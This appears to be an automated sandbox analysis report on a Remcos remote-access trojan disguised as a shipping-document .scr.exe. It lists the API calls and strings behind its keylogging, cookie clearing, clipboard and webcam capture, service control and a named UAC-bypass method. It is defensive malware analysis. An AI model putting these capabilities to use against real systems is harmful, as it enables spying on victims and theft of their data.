                                                      • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                      • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                      • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                        • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                        • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnumInfoOpenQuerysend
                                                      • String ID: TUFTUF$>G$DG$DG
                                                      • API String ID: 3114080316-344394840
                                                      • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                      • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                      • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                      • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                      • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                      • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                      • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                      • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                      • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                      APIs
                                                        • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                        • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                        • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                      • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                      • API String ID: 1133728706-4073444585
                                                      • Opcode ID: f18917443f7c6820299f50b24860e0ced39b7309a667dc30009aa6e24bb425c3
                                                      • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                      • Opcode Fuzzy Hash: f18917443f7c6820299f50b24860e0ced39b7309a667dc30009aa6e24bb425c3
                                                      • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                      • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                      • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                      • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                      • int.LIBCPMT ref: 0040FC0F
                                                        • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                        • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                      • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                      • String ID: P[G
                                                      • API String ID: 2536120697-571123470
                                                      • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                      • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                      • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                      • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                      APIs
                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                      • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                      • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                      Strings
                                                      • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                      • String ID: http://geoplugin.net/json.gp
                                                      • API String ID: 3121278467-91888290
                                                      • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                      • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                      • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                      • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                      APIs
                                                        • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                      • _free.LIBCMT ref: 0044FD29
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 0044FD34
                                                      • _free.LIBCMT ref: 0044FD3F
                                                      • _free.LIBCMT ref: 0044FD93
                                                      • _free.LIBCMT ref: 0044FD9E
                                                      • _free.LIBCMT ref: 0044FDA9
                                                      • _free.LIBCMT ref: 0044FDB4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                      • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                      • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                      • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                      APIs
                                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe), ref: 00406835
                                                        • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                        • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                      • CoUninitialize.OLE32 ref: 0040688E
                                                      Strings
                                                      • [+] ShellExec success, xrefs: 00406873
                                                      • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                                                      • [+] before ShellExec, xrefs: 00406856
                                                      • C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, xrefs: 00406815, 00406818, 0040686A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeObjectUninitialize_wcslen
                                                      • String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                      • API String ID: 3851391207-2693966283
                                                      • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                      • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                      • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                      • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                      • int.LIBCPMT ref: 0040FEF2
                                                        • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                        • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                      • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                      • String ID: H]G
                                                      • API String ID: 2536120697-1717957184
                                                      • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                      • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                      • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                      APIs
                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                      • GetLastError.KERNEL32 ref: 0040B2EE
                                                      Strings
                                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                      • UserProfile, xrefs: 0040B2B4
                                                      • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                      • [Chrome Cookies not found], xrefs: 0040B308
                                                      Similarity
                                                      • API ID: DeleteErrorFileLast
                                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                      • API String ID: 2018770650-304995407
                                                      • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                      • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                      • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                      APIs
                                                      • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                      Similarity
                                                      • API ID: Console$AllocOutputShowWindow
                                                      • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                      • API String ID: 2425139147-2527699604
                                                      • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                      • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                      • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                      Strings
                                                      • BG, xrefs: 00406909
                                                      • (CG, xrefs: 0040693F
                                                      • C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, xrefs: 00406927
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (CG$C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$BG
                                                      • API String ID: 0-1691816846
                                                      • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                      • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                      • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                      APIs
                                                      • __allrem.LIBCMT ref: 00439789
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                      • __allrem.LIBCMT ref: 004397BC
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                      • __allrem.LIBCMT ref: 004397F1
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                      • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                      • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                      • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                      • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3509577899-3206640213
                                                      • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                      • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                      • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                        • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                      Similarity
                                                      • API ID: H_prologSleep
                                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                      • API String ID: 3469354165-462540288
                                                      • Opcode ID: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                      • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                      • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                      • String ID:
                                                      • API String ID: 493672254-0
                                                      • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                      • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                      • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                      • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                      • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                      • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                      • _free.LIBCMT ref: 00446EF6
                                                      • _free.LIBCMT ref: 00446F1E
                                                      • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                      • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                      • _abort.LIBCMT ref: 00446F3D
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                      • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                      • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                      • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                      • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                      • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                      • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                      • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                      • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                      APIs
                                                      • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                      Similarity
                                                      • API ID: Enum$InfoQueryValue
                                                      • String ID: [regsplt]$DG
                                                      • API String ID: 3554306468-1089238109
                                                      • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                      • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                      • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                      APIs
                                                        • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                        • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                        • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                      • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                        • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                        • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                      • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                      • API String ID: 2974294136-753205382
                                                      • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                      • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                      • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                      • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • wsprintfW.USER32 ref: 0040A905
                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: EventLocalTimewsprintf
                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                      • API String ID: 1497725170-248792730
